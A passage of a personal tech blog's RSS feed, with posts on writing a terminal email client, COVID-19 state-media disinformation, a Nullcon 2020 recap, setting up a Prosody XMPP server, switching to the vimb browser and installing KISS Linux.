735suggesting that we regress to the Dark Ages?”. No, I’m not suggesting
736that we regress, but rather, progress mindfully.</p>
737
738<div class="footnotes">
739<hr />
740<ol>
741<li id="fn-bringing-up-kiss">
742<p>No, I don’t go “I use KISS btw”. I don’t bring it
743up unless provoked. <a href="#fnref-bringing-up-kiss" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
744</li>
745</ol>
746</div>
747]]></description><link>https://icyphox.sh/blog/kiss-zen</link><pubDate>Fri, 03 Apr 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/kiss-zen</guid></item><item><title>Introducing mael</title><description><![CDATA[<p><strong>Update</strong>: The code lives here: <a href="https://github.com/icyphox/mael">https://github.com/icyphox/mael</a></p>
748
749<p>I’ve been on the lookout for a good terminal-based email client since
750forever, and I’ve tried almost all of them. The one I use right now
751sucks a little less—<a href="https://git.sr.ht/~sircmpwn/aerc">aerc</a>. I have
752some gripes with it though, like the problem with outgoing emails not
753getting copied to the Sent folder, and instead erroring out with
754a cryptic <code>EOF</code>—that’s literally all it says.
755I’ve tried mutt, but I find it a little excessive. It feels like the
756weechat of email—to many features that you’ll probably never use.</p>
757
758<p>I need something clean and simple, less bloated (for the lack of
759a better term). This is what motivated me to try writing my own. The
760result of this (and not to mention, being holed up at home with nothing
761better to do), is <strong>mael</strong>.<sup class="footnote-ref" id="fnref-oss"><a href="#fn-oss">1</a></sup></p>
762
763<p>mael isn’t like your usual TUI clients. I envision this to turn out
764similar to mailx—a prompt-based UI. The reason behind this UX decision
765is simple: it’s easier for me to write. :)</p>
766
767<p>Speaking of writing it, it’s being written in a mix of Python and bash.
768Why? Because Python’s <code>email</code> and <code>mailbox</code> modules are fantastic, and
769I don’t think I want to parse Maildirs in bash. “But why not pure
770Python?” Well, I’m going to be shelling out a lot (more on this in a bit),
771and writing interactive UIs in bash is a lot more intuitive, thanks to
772some of the nifty features that later versions of bash have—<code>read</code>,
773<code>mapfile</code> etc.</p>
774
775<p>The reason I’m shelling out is because two key components to this
776client, that I haven’t yet talked about—<code>mbsync</code> and <code>msmtp</code> are in
777use, for IMAP and SMTP respectively. And <code>mbsync</code> uses the Maildir
778format, which is why I’m relying on Python’s <code>mailbox</code> package. Why is
779this in the standard library anyway?!</p>
780
781<p>The architecture of the client is pretty interesting (and possibly very
782stupid), but here’s what happens:</p>
783
784<ul>
785<li>UI and prompt stuff in bash</li>
786<li>emails are read using <code>less</code></li>
787<li>email templates (RFC 2822) are parsed and generated in Python</li>
788<li>this is sent to bash in STDOUT, like</li>
789</ul>
790
791<div class="codehilite"><pre><span></span><code><span class="nv">msg</span><span class="o">=</span><span class="s2">"</span><span class="k">$(</span>./mael-parser <span class="s2">"</span><span class="nv">$maildir_message_path</span><span class="s2">"</span><span class="k">)</span><span class="s2">"</span>
792</code></pre></div>
793
794<p>These kind of one-way (bash -> Python) calls are what drive the entire
795process. I’m not sure what to think of it. Perhaps I might just give up
796and write the entire thing in Python.
797Or…I might just scrap this entirely and just shut up and use aerc.
798I don’t know yet. The code does seem to be growing in size rapidly. It’s
799about ~350 LOC in two days of writing (Python + bash). New problems
800arise every now and then and it’s pretty hard to keep track of all of
801this. It’ll be cool when it’s all done though (I think).</p>
802
803<p>If only things just worked.</p>
804
805<div class="footnotes">
806<hr />
807<ol>
808<li id="fn-oss">
809<p>I have yet to open source it; this post will be updated with
810a link to it when I do. <a href="#fnref-oss" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
811</li>
812</ol>
813</div>
814]]></description><link>https://icyphox.sh/blog/mael</link><pubDate>Sun, 29 Mar 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/mael</guid></item><item><title>COVID-19 disinformation</title><description><![CDATA[<p>The virus spreads around the world, along with a bunch of disinformation
815and potential malware / phishing campaigns. There are many actors,
816pushing many narratives—some similar, some different. </p>
817
818<p>Interestingly, the three big players in the information warfare
819space—Russia, Iran and China seem to be running similar stories on
820their state-backed media outlets. While they all tend to lean towards
821the same, fairly anti-U.S. sentiments—that is, blaming the US for
822weaponizing the crisis for political gain—Iran and Russia’s content
823come off as more…conspiratorial.
824In essence, they claim that the COVID-19 virus is a “bioweapon”
825developed by the U.S.</p>
826
827<p>Russian news agency
828<a href="https://twitter.com/RT_com/status/1233187558793924608">RT tweeted</a>:</p>
829
830<blockquote>
831 <p>Show of hands, who isn’t going to be surprised if it ever gets
832 revealed that #coronavirus is a bioweapon?</p>
833</blockquote>
834
835<p>RT also published
836<a href="https://www.rt.com/usa/481485-coronavirus-russia-state-department/">an article</a>
837mocking the U.S. for concerns over Russian disinformation.
838Another article by RT,
839<a href="https://www.rt.com/op-ed/481831-coronavirus-kill-bill-capitalism-communism/">an op-ed</a>
840suggests the virus’ impact on financial markets might bring about the
841reinvention of communism and the end of the global capitalist system.
842Russian state-sponsored media can also be seen amplifying Iranian
843conspiracy theories—including the Islamic Revolutionary Guard Corps’
844(IRGC) suggestion that COVID-19
845<a href="https://www.rt.com/news/482405-iran-coronavirus-us-biological-weapon/">is a U.S. bioweapon</a>.</p>
846
847<p>Iranian media outlets appear to be running stories having similar
848themese, as well. Here’s one
849<a href="https://www.presstv.com/Detail/2020/03/05/620217/US-coronavirus-James-Henry-Fetzer">by PressTV</a>,
850where they very boldly claim that the virus was developed by
851the U.S. and/or Isreal, to use as a bioweapon against Iran. Another
852<a href="https://www.presstv.com/Detail/2020/03/05/620213/Coronavirus-was-produced-in-a-laboratory">nonsensical piece</a>
853by PressTV suggests that
854“there are components of the virus that are related to HIV that could not have occurred naturally”.
855The same article pushes another theory:</p>
856
857<blockquote>
858 <p>There has been some speculation that as the Trump Administration has
859 been constantly raising the issue of growing Chinese global
860 competitiveness as a direct threat to American national security and
861 economic dominance, it might be possible that Washington has created
862 and unleashed the virus in a bid to bring Beijing’s growing economy
863 and military might down a few notches. It is, to be sure, hard to
864 believe that even the Trump White House would do something so
865 reckless, but there are precedents for that type of behavior</p>
866</blockquote>
867
868<p>These “theories”, as is evident, are getting wilder and wilder.</p>
869
870<p>Unsurprisingly, China produces the most amount of content related to the
871coronavirus, but they’re quite distinct in comparison to Russian and
872Iranian media. The general theme behind Chinese narratives is
873critisizing the West for…a lot of things.</p>
874
875<p>Global Times claims that
876<a href="http://www.globaltimes.cn/content/1178494.shtml">democracy is an insufficient system</a>
877to battle the coronavirus. They <a href="http://www.globaltimes.cn/content/1178494.shtml">blame the U.S.</a>
878for unfair media coverage against China, and other <a href="http://www.globaltimes.cn/content/1180630.shtml">anti-China
879narratives</a>.
880There are a ton other articles that play the racism/discrimination
881card—I wouldn’t blame them though. <a href="http://www.globaltimes.cn/content/1178465.shtml">Here’s one</a>.</p>
882
883<p>In the case of India, most disinfo (actually, misinfo) is mostly just
884pseudoscientific / alternative medicine / cures in the form of WhatsApp
885forwards—"Eat foo! Eat bar!”.<sup class="footnote-ref" id="fnref-cowpiss"><a href="#fn-cowpiss">1</a></sup></p>
886
887<p>I’ve also been noticing a <em>ton</em> of COVID-19 / coronavirus related domain
888registrations happening. Expect phishing and malware campaigns using the
889virus as a theme. In the past 24 hrs, ~450 <code>.com</code> domains alone were
890registered.</p>
891
892<p><img src="/static/img/corona_domains.png" alt="corona domains" /></p>
893
894<p>Anywho, there are bigger problems at hand—like the fact that my uni
895still hasn’t suspended classes!</p>
896
897<div class="footnotes">
898<hr />
899<ol>
900<li id="fn-cowpiss">
901<p><a href="https://www.thehindu.com/news/national/coronavirus-group-hosts-cow-urine-party-says-covid-19-due-to-meat-eaters/article31070516.ece">https://www.thehindu.com/news/national/coronavirus-group-hosts-cow-urine-party-says-covid-19-due-to-meat-eaters/article31070516.ece</a> <a href="#fnref-cowpiss" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
902</li>
903</ol>
904</div>
905]]></description><link>https://icyphox.sh/blog/covid19-disinfo</link><pubDate>Sun, 15 Mar 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/covid19-disinfo</guid></item><item><title>Nullcon 2020</title><description><![CDATA[<p><strong>Disclaimer</strong>: Political.</p>
906
907<p>This year’s conference was at the Taj Hotel and Convention center, Dona
908Paula, and its associated party at Cidade de Goa, also by Taj.
909Great choice of venue, perhaps even better than last time. The food was
910fine, the views were better.</p>
911
912<p>With <em>those</em> things out of the way—let’s talk talks. I think
913I preferred the panels to the talks—I enjoy a good, stimulating
914discussion as opposed to only half-understanding a deeply technical
915talk—but that’s just me. But there was this one talk that I really
916enjoyed, perhaps due to its unintended comedic value; I’ll get into that
917later.</p>
918
919<p>The list of panels/talks I attended in order:</p>
920
921<p><strong>Day 1</strong></p>
922
923<ul>
924<li>Keynote: The Metadata Trap by Micah Lee (Talk)</li>
925<li>Securing the Human Factor (Panel)</li>
926<li>Predicting Danger: Building the Ideal Threat Intelligence Model (Panel)</li>
927<li>Lessons from the Cyber Trenches (Panel)</li>
928<li>Mlw 41#: a new sophisticated loader by APT group TA505 by Alexey Vishnyakov (Talk)</li>
929<li>Taking the guess out of Glitching by Adam Laurie (Talk)</li>
930<li>Keynote: Cybersecurity in India – Information Assymetry, Cross Border
931Threats and National Sovereignty by Saumil Shah (Talk)</li>
932</ul>
933
934<p><strong>Day 2</strong></p>
935
936<ul>
937<li>Keynote: Crouching hacker, killer robot? Removing fear from
938cyber-physical security by Stefano Zanero (Talk)</li>
939<li>Supply Chain Security in Critical Infrastructure Systems (Panel)</li>
940<li>Putting it all together: building an iOS jailbreak from scratch by
941Umang Raghuvanshi (Talk)</li>
942<li>Hack the Law: Protection for Ethical Cyber Security Research in India
943(Panel)</li>
944</ul>
945
946<h2 id="re-closing-keynote">Re: Closing keynote</h2>
947
948<p>I wish I could link the talk, but it hasn’t been uploaded just yet. I’ll
949do it once it has. So, I’ve a few comments I’d like to make on some of
950Saumil’s statements.</p>
951
952<p>He proposed that the security industry trust the user more, and let them
953make the decisions pertaining to personal security / privacy.
954Except…that’s just not going to happen. If all users were capable
955of making good, security-first choices—we as an industry don’t
956need to exist. But that is unfortunately not the case.
957Users are dumb. They value convenience and immediacy over
958security. That’s the sad truth of the modern age.</p>
959
960<p>Another thing he proposed was that the Indian Government build our own
961“Military Grade” and “Consumer Grade” encryption.</p>
962
963<p><em>…what?</em></p>
964
965<p>A “security professional” suggesting that we roll our own crypto? What
966even. Oh and, to top it off—when
967<a href="https://twitter.com/tame_wildcard">Raman</a>, very rightly countered
968saying that the biggest opponent to encryption <em>is</em> the Government, and
969trusting them to build safe cryptosystems is probably not wise, he
970responded by saying something to the effect of “Eh, who cares? If they
971want to backdoor it, let them.” </p>
972
973<p>Bruh moment.</p>
974
975<p>He also had some interesting things to say about countering
976disinformation. He said, and I quote “Join the STFU University”.</p>
977
978<p>¿wat? Is that your best solution? </p>
979
980<p>Judging by his profile, and certain other things he said in the talk, it
981is safe to conclude that his ideals are fairly…nationalistic. I’m not
982one to police political opinions, I couldn’t care less which way you
983lean, but the statements made in the talk were straight up
984incorrect.</p>
985
986<h2 id="closing-thoughts">Closing thoughts</h2>
987
988<p>This came out more rant-like than I’d intended. It is also the first
989blog post where I dip my toes into politics. I’ve some thoughts on more
990controversial topics for my next entry. That’ll be fun, especially when
991my follower count starts dropping. LULW.</p>
992
993<p>Saumil, if you ever end up reading this, note that this is not
994a personal attack. I think you’re a cool guy.</p>
995
996<p>Note to the Nullcon organizers: you guys did a fantastic job running the
997conference despite Corona-chan’s best efforts. I’d like to suggest one
998little thing though—please VET YOUR SPEAKERS more!</p>
999
1000<p><img src="/static/img/nullcon_beach.jpg" alt="group pic" /></p>
1001]]></description><link>https://icyphox.sh/blog/nullcon-2020</link><pubDate>Mon, 09 Mar 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/nullcon-2020</guid></item><item><title>Setting up Prosody for XMPP</title><description><![CDATA[<p>Remember the <a href="/blog/irc-for-dms/">IRC for DMs</a> article I wrote a while
1002back? Well…it’s safe to say that IRC didn’t hold up too well. It first
1003started with the bot. Buggy code, crashed a lot—we eventually gave up
1004and didn’t bring the bot back up. Then came the notifications, or lack
1005thereof. Revolution IRC has a bug where your custom notification rules
1006just get ignored after a while. In my case, this meant that
1007notifications for <code>#crimson</code> stopped entirely. Unless, of course, Nerdy
1008pinged me each time.</p>
1009
1010<p>Again, none of these problems are inherent to IRC itself. IRC is
1011fantastic, but perhaps wasn’t the best fit for our usecase. I still do
1012use IRC though, just not for 1-on-1 conversations.</p>
1013
1014<h2 id="why-xmpp">Why XMPP?</h2>
1015
1016<p>For one, it’s better suited for 1-on-1 conversations. It also has
1017support for end-to-end encryption (via OMEMO), something IRC doesn’t
1018have.<sup class="footnote-ref" id="fnref-otr"><a href="#fn-otr">1</a></sup> Also, it isn’t centralized (think: email).</p>
1019
1020<h2 id="soprosody">So…Prosody</h2>
1021
1022<p><a href="https://prosody.im">Prosody</a> is an XMPP server. Why did I choose this
1023over ejabberd, OpenFire, etc.? No reason, really. Their website looked
1024cool, I guess.</p>
1025
1026<h3 id="installing">Installing</h3>
1027
1028<p>Setting it up was pretty painless (I’ve <a href="/blog/mailserver">experienced
1029worse</a>). If you’re on a Debian-derived system, add:</p>
1030
1031<pre><code># modify according to your distro
1032deb https://packages.prosody.im/debian buster main
1033</code></pre>
1034
1035<p>to your <code>/etc/apt/sources.list</code>, and:</p>
1036
1037<pre><code># apt update
1038# apt install prosody
1039</code></pre>
1040
1041<h3 id="configuring">Configuring</h3>
1042
1043<p>Once installed, you will find the config file at
1044<code>/etc/prosody/prosody.cfg.lua</code>. Add your XMPP user (we will make this
1045later), to the <code>admins = {}</code> line.</p>
1046
1047<pre><code>admins = {"user@chat.example.com"}
1048</code></pre>
1049
1050<p>Head to the <code>modules_enabled</code> section, and add this to it:</p>
1051
1052<pre><code>modules_enabled = {
1053 "posix";
1054 "omemo_all_access";
1055...
1056 -- uncomment these
1057 "groups";
1058 "mam";
1059 -- and any others you think you may need
1060}
1061</code></pre>
1062
1063<p>We will install the <code>omemo_all_access</code> module later.</p>
1064
1065<p>Set <code>c2s_require_encryption</code>, <code>s2s_require_encryption</code>, and
1066<code>s2s_secure_auth</code> to <code>true</code>.
1067Set the <code>pidfile</code> to <code>/tmp/prosody.pid</code> (or just leave it as default?).</p>
1068
1069<p>By default, Prosody stores passwords in plain-text, so fix that by
1070setting <code>authentication</code> to <code>"internal_hashed"</code></p>
1071
1072<p>Head to the <code>VirtualHost</code> section, and add your vhost. Right above it,
1073set the path to the HTTPS certificate and key:</p>
1074
1075<pre><code>certificates = "certs" -- relative to your config file location
1076https_certificate = "certs/chat.example.com.crt"
1077https_key = "certs/chat.example.com.key"
1078...
1079
1080VirtualHost "chat.example.com"
1081</code></pre>
1082
1083<p>I generated these certs using Let’s Encrypt’s <code>certbot</code>, you can use
1084whatever. Here’s what I did:</p>
1085
1086<pre><code># certbot --nginx -d chat.example.com
1087</code></pre>
1088
1089<p>This generates certs at <code>/etc/letsencrypt/live/chat.example.com/</code>. You can
1090trivially import these certs into Prosody’s <code>/etc/prosody/certs/</code> directory using:</p>
1091
1092<pre><code># prosodyctl cert import /etc/letsencrypt/live/chat.example.com
1093</code></pre>
1094
1095<h3 id="plugins">Plugins</h3>
1096
1097<p>All the modules for Prosody can be <code>hg clone</code>’d from
1098<a href="https://hg.prosody.im/prosody-modules.">https://hg.prosody.im/prosody-modules.</a> You will, obviously, need
1099Mercurial installed for this.</p>
1100
1101<p>Clone it somewhere, and: </p>
1102
1103<pre><code># cp -R prosody-modules/mod_omemo_all_access /usr/lib/prosody/modules
1104</code></pre>
1105
1106<p>Do the same thing for whatever other module you choose to install. Don’t
1107forget to add it to the <code>modules_enabled</code> section in the config.</p>
1108
1109<h3 id="adding-users">Adding users</h3>
1110
1111<p><code>prosodyctl</code> makes this a fairly simple task:</p>
1112
1113<pre><code>$ prosodyctl adduser user@chat.example.com
1114</code></pre>
1115
1116<p>You will be prompted for a password. You can optionally, enable
1117user registrations from XMPP/Jabber clients (security risk!), by setting
1118<code>allow_registration = true</code>.</p>
1119
1120<p>I may have missed something important, so here’s <a href="https://x.icyphox.sh/prosody.cfg.lua">my
1121config</a> for reference.</p>
1122
1123<h2 id="closing-notes">Closing notes</h2>
1124
1125<p>That’s pretty much all you need for 1-on-1 E2EE chats. I don’t know much
1126about group chats just yet—trying to create a group in Conversations
1127gives a “No group chat server found”. I will figure it out later.</p>
1128
1129<p>Another thing that doesn’t work in Conversations is adding an account
1130using an <code>SRV</code> record.<sup class="footnote-ref" id="fnref-srv"><a href="#fn-srv">2</a></sup> Which kinda sucks, because having a <code>chat.</code>
1131subdomain isn’t very clean, but whatever.</p>
1132
1133<p>Oh, also—you can message me at
1134<a href="xmpp:icy@chat.icyphox.sh">icy@chat.icyphox.sh</a>.</p>
1135
1136<div class="footnotes">
1137<hr />
1138<ol>
1139<li id="fn-otr">
1140<p>I’m told IRC supports OTR, but I haven’t ever tried. <a href="#fnref-otr" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
1141</li>
1142
1143<li id="fn-srv">
1144<p><a href="https://prosody.im/doc/dns">https://prosody.im/doc/dns</a> <a href="#fnref-srv" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
1145</li>
1146</ol>
1147</div>
1148]]></description><link>https://icyphox.sh/blog/prosody</link><pubDate>Tue, 18 Feb 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/prosody</guid></item><item><title>Status update</title><description><![CDATA[<p>It’s only been a two weeks since I got back to campus, and we’ve
1149<em>already</em> got our first round of cycle tests starting this Tuesday.
1150Granted, I returned a week late, but…that’s nuts!</p>
1151
1152<p>We’re two whole weeks into 2020; I should’ve been working on something
1153status update worthy, right? Not really, but we’ll see.</p>
1154
1155<h2 id="no-more-cloudflare">No more Cloudflare!</h2>
1156
1157<p>Yep. If you weren’t aware—pre-2020 this site was behind Cloudflare
1158SSL and their DNS. I have since migrated off it to
1159<a href="https://he.net">he.net</a>, thanks to highly upvoted Lobste.rs comment.
1160Because of this switch, I infact, learnt a ton about DNS.</p>
1161
1162<p>Migrating to HE was very painless, but I did have to research a lot
1163about PTR records—Cloudflare kinda dumbs it down. In my case, I had to
1164rename my DigitalOcean VPS instance to the FQDN, which then
1165automagically created a PTR record at DO’s end.</p>
1166
1167<h2 id="i-dropped-icyrc">I dropped icyrc</h2>
1168
1169<p>The IRC client I was working on during the end of last
1170December–early-January? Yeah, I lost interest. Apparently writing C and
1171ncurses isn’t very fun or stimulating.</p>
1172
1173<p>This also means I’m back on weechat. Until I find another client that
1174plays well with ZNC, that is.</p>
1175
1176<h2 id="kiss-stuff">KISS stuff</h2>
1177
1178<p>I now maintain two new packages in the KISS community repository—2bwm
1179and aerc! The KISS package system is stupid simple to work with. Creating
1180packages has never been easier.</p>
1181
1182<h2 id="icyphoxshfriendsfriends"><a href="/friends">icyphox.sh/friends</a></h2>
1183
1184<p>Did you notice that yet? I’ve been curating a list of people I know IRL
1185and online, and linking to their online presence. This is like a webring
1186of sorts, and promotes inter-site traffic—making the web more “web”
1187again.</p>
1188
1189<p>If you know me, feel free to <a href="/about#contact">hit me up</a> and I’ll link
1190your site too! My apologies if I’ve forgotten your name.</p>
1191
1192<h2 id="patreon">Patreon!</h2>
1193
1194<p>Is this big news? I dunno, but yes—I now have a Patreon. I figured I’d
1195cash in on the newfound traffic my site’s been getting. There won’t be
1196any exclusive content or any tiers or whatever. Nothing will change.
1197Just a place for y’all to toss me some $$$ if you wish to do so. ;)</p>
1198
1199<p>Oh, and it’s at <a href="https://patreon.com/icyphox">patreon.com/icyphox</a>.</p>
1200
1201<h2 id="misc">Misc.</h2>
1202
1203<p>The Stormlight Archive is likely the <em>best</em> epic I have ever read till
1204date. I’m still not done yet; about 500 odd pages to go as of this
1205writing. But wow, Brandon really does know how to build worlds and magic
1206systems. I cannot wait to read all about the
1207<a href="https://coppermind.net/wiki/Cosmere">cosmere</a>.</p>
1208
1209<p>I have also been working out for the past month or so. I can see them
1210gainzzz. I plan to keep track of my progress, I just don’t know how to
1211quantify it. Perhaps I’ll log the number of reps × sets I do each time,
1212and with what weights. I can then look back to see if either the weights
1213have increased since, or the number of reps × sets have. If you know of
1214a better way to quantify progress, let me know! I’m pretty new to this.</p>
1215]]></description><link>https://icyphox.sh/blog/2020-01-18</link><pubDate>Sat, 18 Jan 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2020-01-18</guid></item><item><title>Vimb&#58; my Firefox replacement</title><description><![CDATA[<p>After having recently installed <a href="https://getkiss.org">KISS</a>, and
1216building Firefox from source, I was exposed to the true monstrosity that
1217Firefox—and web browsers in general—is. It took all of 9 hours to
1218build the dependencies and then Firefox itself.</p>
1219
1220<p>Sure, KISS now ships Firefox binaries in the
1221<a href="https://github.com/kisslinux/repo/tree/master/extra/firefox-bin">firefox-bin</a>
1222package; I decided to get rid of that slow mess anyway.</p>
1223
1224<h2 id="enter-vimb">Enter vimb</h2>
1225
1226<p><a href="https://fanglingsu.github.io/vimb/">vimb</a> is a browser based on
1227<a href="https://webkitgtk.org/">webkit2gtk</a>, with a Vim-like interface.
1228<code>webkit2gtk</code> builds in less than a minute—it blows Firefox out of
1229the water, on that front.</p>
1230
1231<p>There isn’t much of a UI to it—if you’ve used Vimperator/Pentadactyl
1232(Firefox plugins), vimb should look familiar to you.
1233It can be configured via a <code>config.h</code> or a text based config file at
1234<code>~/.config/vimb/config</code>.
1235Each “tab” opens a new instance of vimb, in a new window but this can
1236get messy really fast if you have a lot of tabs open.</p>
1237
1238<h2 id="enter-tabbed">Enter tabbed</h2>
1239
1240<p><a href="https://tools.suckless.org/tabbed/">tabbed</a> is a tool to <em>embed</em> X apps
1241which support xembed into a tabbed UI. This can be used in conjunction
1242with vimb, like so:</p>
1243
1244<pre><code>tabbed vimb -e
1245</code></pre>
1246
1247<p>Where the <code>-e</code> flag is populated with the <code>XID</code>, by tabbed. Configuring
1248Firefox-esque keybinds in tabbed’s <code>config.h</code> is relatively easy. Once
1249that’s done—voilà! A fairly sane, Vim-like browsing experience that’s
1250faster and has a smaller footprint than Firefox.</p>
1251
1252<h2 id="ad-blocking">Ad blocking</h2>
1253
1254<p>Ad blocking support isn’t built-in and there is no plugin system
1255available. There are two options for ad blocking:</p>
1256
1257<ol>
1258<li><a href="https://github.com/jun7/wyebadblock">wyebadblock</a></li>
1259<li><code>/etc/hosts</code></li>
1260</ol>
1261
1262<h2 id="caveats">Caveats</h2>
1263
1264<p><em>Some</em> websites tend to not work because they detect vimb as an older
1265version of Safari (same web engine). This is a minor inconvenience, and
1266not a dealbreaker for me. I also cannot login to Google’s services for
1267some reason, which is mildly annoying, but it’s good in a way—I am now
1268further incentivised to dispose of my Google account.</p>
1269
1270<p>And here’s the screenshot y’all were waiting for:</p>
1271
1272<p><img src="/static/img/vimb.png" alt="vimb" /></p>
1273]]></description><link>https://icyphox.sh/blog/mnml-browsing</link><pubDate>Thu, 16 Jan 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/mnml-browsing</guid></item><item><title>Five days in a TTY</title><description><![CDATA[<p>This new semester has been pretty easy on me, so far. I hardly every
1274have any classes (again, so far), and I’ve a ton of free time on my
1275hands. This calls for—yep—a distro hop! </p>
1276
1277<h2 id="why-kiss">Why KISS?</h2>
1278
1279<p><a href="https://getkiss.org">KISS</a> has been making rounds on the interwebz lately.<sup class="footnote-ref" id="fnref-hn"><a href="#fn-hn">1</a></sup>
1280The Hacker News post spurred <em>quite</em> the discussion. But then again,
1281that is to be expected from Valleybros who use macOS all day. :^)</p>
1282
1283<p>From the website,</p>
1284
1285<blockquote>
1286 <p>An independent Linux® distribution with a focus on simplicity and the
1287 concept of “less is more”. The distribution targets <em>only</em> the x86-64
1288 architecture and the English language.</p>
1289</blockquote>
1290
1291<p>Like many people did in the HN thread, “simplicity” here is not to be
1292confused with “ease”. It is instead, simplicity in terms of lesser and
1293cleaner code—no
1294<a href="https://www.urbandictionary.com/define.php?term=poetterware">Poetterware</a>.</p>
1295
1296<p>This, I can get behind. A clean system with less code is like a clean
1297table. It’s nice to work on. It also implies security to a certain
1298extent since there’s a smaller attack surface. </p>
1299
1300<p>The <a href="https://github.com/kisslinux/kiss"><code>kiss</code></a> package manager is written
1301is pure POSIX sh, and does <em>just enough</em>. Packages are compiled from
1302source and <code>kiss</code> automatically performs dependency resolution. Creating
1303packages is ridiculously easy too.</p>
1304
1305<p>Speaking of packages, all packages—both official & community
1306repos—are run through <code>shellcheck</code> before getting merged. This is
1307awesome; I don’t think this is done in any other distro.</p>
1308
1309<p>In essence, KISS sucks less.</p>
1310
1311<h2 id="installing-kiss">Installing KISS</h2>
1312
1313<p>The <a href="https://getkiss.org/pages/install">install guide</a> is very easy to
1314follow. Clear instructions that make it hard to screw up; that didn’t
1315stop me from doing so, however.</p>
1316
1317<h3 id="day-1">Day 1</h3>
1318
1319<p>Although technically not in a TTY, it was still not <em>in</em> the KISS
1320system—I’ll count it. I’d compiled the kernel in the chroot and
1321decided to use <code>efibootmgr</code> instead of GRUB. <code>efibootmgr</code> is a neat tool
1322to modify the Intel Extensible Firmware Interface (EFI). Essentially,
1323you boot the <code>.efi</code> directly as opposed to choosing which boot entry
1324you want to boot, through GRUB. Useful if you have just one OS on the
1325system. Removes one layer of abstraction.</p>
1326
1327<p>Adding a new EFI entry is pretty easy. For me, the command was:</p>
1328
1329<pre><code>efibootmgr --create
1330 --disk /dev/nvme0n1 \
1331 --part 1 \
1332 --label KISS Linux \
1333 --loader /vmlinuz
1334 --unicode 'root=/dev/nvme0n1p3 rw' # kernel parameters
1335</code></pre>
1336
1337<p>Mind you, this didn’t work the first time, or the second, or the
1338third … a bunch of trial and error (and asking on <code>#kisslinux</code>)
1339later, it worked.</p>
1340
1341<p>Well, it booted, but not into KISS. Took a while to figure out that the
1342culprit was <code>CONFIG_BLK_DEV_NVME</code> not having been set in the kernel
1343config. Rebuild & reboot later, I was in.</p>
1344
1345<h3 id="day-2">Day 2</h3>
1346
1347<p>Networking! How fun. An <code>ip a</code> and I see that both USB tethering
1348(ethernet) and wireless don’t work. Great. Dug around a bit—missing
1349wireless drivers was the problem. Found my driver, a binary <code>.ucode</code> from
1350Intel (eugh!). The whole day was spent in figuring out why the kernel
1351would never load the firmware. I tried different variations—loading
1352it as a module (<code>=m</code>), baking it in (<code>=y</code>) but no luck.</p>
1353
1354<h3 id="day-3">Day 3</h3>
1355
1356<p>I then tried Alpine’s kernel config but that was so huge and had a <em>ton</em>
1357of modules and took far too long to build each time, much to my
1358annoyance. Diffing their config and mine was about ~3000 lines! Too much
1359to sift through. On a whim, I decided to scrap my entire KISS install
1360and start afresh. </p>
1361
1362<p>For some odd reason, after doing the <em>exact</em> same things I’d done
1363earlier, my wireless worked this time. Ethernet didn’t, and still
1364doesn’t, but that’s ok.</p>
1365
1366<p>Building <code>xorg-server</code> was next, which took about an hour, mostly thanks
1367to spotty internet. The build went through fine, though what wasn’t was
1368no input after starting X. Adding my user to the <code>input</code> group wasn’t
1369enough. The culprit this time was a missing <code>xf86-xorg-input</code> package.
1370Installing that gave me my mouse back, but not the keyboard!</p>
1371
1372<p>It was definitely not the kernel this time, because I had a working
1373keyboard in the TTY. </p>
1374
1375<h3 id="day-4-day-5">Day 4 & Day 5</h3>
1376
1377<p>This was probably the most annoying of all, since the fix was <em>trivial</em>.
1378By this point I had exhausted all ideas, so I decided to build my
1379essential packages and setup my system. Building Firefox took nearly
13809 hours, the other stuff were much faster.</p>
1381
1382<p>I was still chatting on IRC during this, trying to zero down on what the
1383problem could be. And then:</p>
1384
1385<pre><code><dylanaraps> For starters I think st fails due to no fonts.
1386</code></pre>
1387
1388<p>Holy shit! Fonts. I hadn’t installed <em>any</em> fonts. Which is why none of
1389the applications I tried launching via <code>sowm</code> ever launched, and hence,
1390I was lead to believe my keyboard was dead.</p>
1391
1392<h2 id="worth-it">Worth it?</h2>
1393
1394<p>Absolutely. I <em>cannot</em> stress on how much of a learning experience this
1395was. Also a test of my patience and perseverance, but yeah ok. I also
1396think that this distro is my endgame (yeah, right), probably because
1397other distros will be nothing short of disappointing, in one way or
1398another.</p>
1399
1400<p>Huge thanks to the folks at <code>#kisslinux</code> on Freenode for helping me
1401throughout. And I mean, they <em>really</em> did. We chatted for hours on end
1402trying to debug my issues.</p>
1403
1404<p>I’ll now conclude with an obligatory screenshot.</p>
1405
1406<p><img src="https://x.icyphox.sh/R6G.png" alt="scrot" /></p>
1407
1408<div class="footnotes">
1409<hr />
1410<ol>
1411<li id="fn-hn">
1412<p><a href="https://news.ycombinator.com/item?id=21021396">https://news.ycombinator.com/item?id=21021396</a> <a href="#fnref-hn" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
1413</li>
1414</ol>
1415</div>
1416]]></description><link>https://icyphox.sh/blog/five-days-tty</link><pubDate>Mon, 13 Jan 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/five-days-tty</guid></item><item><title>2019 in review</title><description><![CDATA[<p>Just landed in a rainy Chennai, back in campus for my 6th semester.
1417A little late to the “year in review blog post” party; travel took up
1418most of my time. Last year was pretty eventful (at least in my books),
1419and I think I did a bunch of cool stuff—let’s see!</p>
1420
1421<h2 id="interning-at-securelayer7">Interning at SecureLayer7</h2>
1422
1423<p>Last summer, I interned at <a href="https://securelayer7.net">SecureLayer7</a>,
1424a security consulting firm in Pune, India. My work was mostly in
1425hardware and embededded security research. I learnt a ton about ARM and
1426MIPS reversing and exploitation, UART and JTAG, firmware RE and
1427enterprise IoT security.</p>
1428
1429<p>I also earned my first CVE! I’ve written about it in detail
1430<a href="/blog/fb50">here</a>.</p>
1431
1432<h2 id="conferences">Conferences</h2>
1433
